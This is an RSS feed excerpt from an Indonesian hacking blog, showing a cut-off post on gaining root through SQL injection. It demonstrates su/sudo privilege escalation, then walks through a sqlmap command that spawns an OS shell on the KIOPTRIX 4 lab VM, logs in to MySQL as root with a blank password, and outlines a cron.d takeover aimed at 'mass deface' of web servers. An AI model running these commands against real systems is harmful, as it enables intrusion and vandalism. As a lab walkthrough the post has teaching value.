<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0' version='2.0'><channel><atom:id>tag:blogger.com,1999:blog-4322924474312123143</atom:id><lastBuildDate>Sat, 19 May 2012 06:22:26 +0000</lastBuildDate><category>flash</category><category>Information Gathering</category><category>0day</category><category>encoding</category><category>bash command</category><category>MITM</category><category>SQL Injection</category><category>bug</category><category>Deface</category><category>Aircrack</category><category>SSL dissection</category><category>spawn</category><category>Dork</category><category>dns spoof</category><category>ip_forwarding was disabled</category><category>ollydbg</category><category>Tutorial</category><category>tty</category><category>Firewall</category><category>Fix</category><category>sed</category><category>back connect</category><category>Secure Back Door</category><category>Admin</category><category>awk</category><category>cp</category><category>etter.conf</category><category>python</category><category>hashcat</category><category>exploitation</category><category>shell</category><category>tee</category><category>rooting</category><category>grep</category><category>Virus</category><category>Vulnerable</category><category>Tamper Data</category><category>Antivirus</category><category>SET</category><category>SQLmap</category><category>Page</category><category>redir_command_on</category><category>sort</category><category>driver</category><category>linux</category><category>facebook</category><category>burpsuite</category><category>Admin Page Finder</category><category>hack</category><category>redir_command_off</category><category>CLI</category><category>Script</category><category>Internet</category><category>MySQL</category><category>payload</category><category>backdoor</category><category>Cracking</category><category>msfencode</category><category>privilege escalation</category><category>nmap</category><category>Wireshark</category><category>Penetration Test</category><category>bluez</category><category>Metasploit</category><category>Fake Login</category><category>Sniffing</category><category>Port</category><category>hash md5</category><category>bluetooth</category><category>Network Forensics</category><category>flash player</category><category>reverse tcp</category><category>Hacking</category><category>cat</category><category>ettercap</category><category>Vulnerable Server</category><category>error</category><category>Maintain Access</category><category>netcat</category><category>BackTrack</category><category>sbd</category><title>Let's kicking ass!</title><description>red-dragon and blusp10it present to you ...</description><link>http://www.root-bt.co.cc/</link><managingEditor>noreply@blogger.com (Double Dragon)</managingEditor><generator>Blogger</generator><openSearch:totalResults>117</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-6438519971227904208</guid><pubDate>Fri, 11 May 2012 04:19:00 +0000</pubDate><atom:updated>2012-05-11T11:19:02.844+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>MySQL</category><category domain='http://www.blogger.com/atom/ns#'>rooting</category><category domain='http://www.blogger.com/atom/ns#'>SQL Injection</category><category domain='http://www.blogger.com/atom/ns#'>SQLmap</category><title>Special Rooting [via SQLmap]</title><description>Root adalah user yang memiliki hak akses tertinggi dalam sistem operasi UNIX. Dalam system operasi Windows, root sama dengan NT AUTHORITY SYSTEM. Privilege escalating pada sistem operasi UNIX cukup mudah. User biasanya menggunakan perintah&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;user@unix:~$ su&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;b&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;Password:&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;su: Authentication failure&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;user@unix:~$&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/b&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Pada perintah su, user harus memasukan password milik root. Jika berhasil, maka user akan menjadi root dalam sistem tersebut. Kebanyakan mesin komputer yang memiliki OS UNIX, password root TIDAK diberikan secara cuma-cuma kepada user lain. Artinya password root hanya diketahui oleh segelintir orang. Hal ini bertujuan agar sistem tetap aman, tanpa user 'nakal' yang menggunakan hak akses root untuk mengubah system.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Mengangkat hak akses juga bisa dilakukan dengan perintah&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;b style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;user@unix:~$ id&lt;/b&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;uid=2000(user) gid=2000(user) groups=2000(user)&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;user@unix:~$ sudo su&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; font-family: monospace; font-weight: bold; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;Password:&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; font-family: monospace; font-weight: bold; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;[sudo] password for www-data:&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; font-family: monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;b style="background-color: black; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;span style="color: lime;"&gt;root@unix:~# id&lt;/span&gt;&lt;/b&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; font-family: monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: red; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="font-weight: 800; line-height: 18px;"&gt;uid=0(root) gid=0(root) groups=0(root)&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Ini adalah sedikit contoh mengenai escalating privilege pada unix. Namun perusahaan yang cerdas, akan membatasi user untuk mengeksekusi perintah sudo su, agar user 'nakal' tidak menggunakan hak akses root untuk mengubah system.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Apa istimewanya root? Kali ini saya akan menjelaskan sedikit kemampuan khusus yang dimiliki oleh root. Yaitu menghapus data milik user lain.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;www-data@red-dragon:/tmp$ echo "delete me if you can" &amp;gt; fuck_you&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;www-data@red-dragon:/tmp$ ls -l fuck_you&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;-rw-r--r-- 1 www-data www-data 21 2012-05-11 10:09 fuck_you&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;www-data@red-dragon:/tmp$ cat fuck_you&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;delete me if you can&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;User bernama www-data membuat sebuah file bernama fuck_you, yang berisi "delete me if you can". File ini terletak pada folder /tmp/.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Note : Tulisan yang berwarna kuning adalah hasil output dari perintah.&lt;/div&gt;&lt;div&gt;Kemudian datang user lain bernama couchdb. User ini sepertinya tidak suka dengan isi dan nama file yang dibuat oleh user www-data. Kemudian ia mencoba untuk menghapus file tersebut.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;b&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;couchdb@red-dragon:/tmp$ ls -l fuck_you&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;-rw-r--r-- 1 www-data www-data 21 2012-05-11 10:09 fuck_you&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;couchdb@red-dragon:/tmp$ rm fuck_you&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;span style="color: yellow;"&gt;rm: remove write-protected regular file `fuck_you'?&lt;/span&gt;&lt;span style="color: lime;"&gt; YES&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;rm: cannot remove `fuck_you': Operation not permitted&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/code&gt;&lt;/b&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Mengapa bisa seperti ini? Telah kita ketahui sebelumnya bahwa file ini milik user www-data, ketika user couchdb hendak menghapus file ini, maka system berkata:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;"File ini milik www-data, kau tidak bisa menghapus file ini..."&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Perhatikan ketika root hendak menghapus file ini&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;b&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; font-family: monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;root@red-dragon:/tmp# ls -l fuck_you&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;-rw-r--r-- 1 www-data www-data 21 2012-05-11 10:09 fuck_you&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;root@red-dragon:/tmp# rm fuck_you&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;root@red-dragon:/tmp# ls -l fuck_you&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;rm: cannot remove `fuck_you': No such file or directory&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/code&gt;&lt;/b&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;File berhasil dihapus oleh root. Pada kasus web server, penggunaan hak akses ini yang membatasi peretas dalam melakukan mass deface. Karena peretas masuk ke dalam system dengan user A, dan tidak bisa mengganti file index milik user B-Z. Pada tahap seperti ini, peretas harus dapat mengangkat hak aksesnya menjadi root agar peretas dapat melancarkan serangan mass deface pada web server target.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kali ini saya akan menjelaskan skema peretasan hak akses root hanya dengan menggunakan SQLmap! Saya melanjutkan peretasan pada KIOPTRIX 4, yang berjalan pada VMware saya. Percobaan peretasan KIOPTRIX 4 sudah saya jelaskan pada postingan saya sebelumnya.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Skill&amp;nbsp;Requirements:&lt;/div&gt;&lt;div&gt;&lt;ol&gt;&lt;li&gt;MYSQL command line&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.root-bt.co.cc/2012/05/spawn-shell-with-sqlmap.html" target="_blank"&gt;Spawn Shell With SQLmap&lt;/a&gt;&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Tools Requirements:&lt;/div&gt;&lt;div&gt;&lt;ol&gt;&lt;li&gt;&lt;a href="http://sqlmap.sourceforge.net/" target="_blank"&gt;SQLmap&lt;/a&gt;&amp;nbsp;(dapat ditemukan pada backtrack 5)&amp;nbsp;&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;Attacking Schema:&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;ol&gt;&lt;li&gt;Attacker mengendalikan shell system milik korban&lt;/li&gt;&lt;li&gt;Mencari informasi mengenai password root database MySQL&lt;/li&gt;&lt;li&gt;Login database dengan akses root, dan membuat evil database&lt;/li&gt;&lt;li&gt;Meremote cron.d milik korban&lt;/li&gt;&lt;li&gt;GAME OVER&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;EULA&lt;/div&gt;&lt;/div&gt;&lt;div&gt;Tutorial ini di tulis dengan tujuan edukasi, penyalahgunaan skill yang terdapat dalam tutorial ini adalah tanggung jawab pembaca.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Walktrough&lt;/div&gt;&lt;div&gt;&lt;a name='more'&gt;&lt;/a&gt;1. Spawn Bash With SQLmap&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Untuk mengendalikan shell system milik korban, kita dapat menggunakan SQLmap. Pada tutorial sebelumnya, saya telah menjelaskan cara melakukan spawn bash dengan SQLmap.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div style="background-color: #141414;"&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;sqlmap -u "http://10.10.1.128/checklogin.php" --data="POSTDATA=myusername=admin&amp;amp;mypassword=admin&amp;amp;Submit=Login" --drop-set-cookie --os-shell&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Setelah bash telah tereksekusi, kita akan menggunakan backdoor sederhana ini untuk melakukan rooting. Kali ini saya akan melakukan rooting melalui MYSQL yang berjalan pada system korban. Namun untuk mengakses database, saya harus dapat log in ke dalam database, dengan username dan password yang telah terdaftar pada database system. Pada posting sebelumnya mengenai&amp;nbsp;&lt;a href="http://www.root-bt.co.cc/2012/05/tricky-log-in-to-mysql.html" target="_blank"&gt;Tricky Log In to MYSQL&lt;/a&gt;, kita telah mengetahui, bahwa root password bernilai blank. Artinya, kita dapat log in ke database dengan username root TANPA password.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;b&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; font-size: small;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;os-shell&amp;gt; &amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: red; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;mysql -uroot -e "show databases;"&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;do you want to retrieve the command standard output? [Y/n/a]&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;command standard output:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; 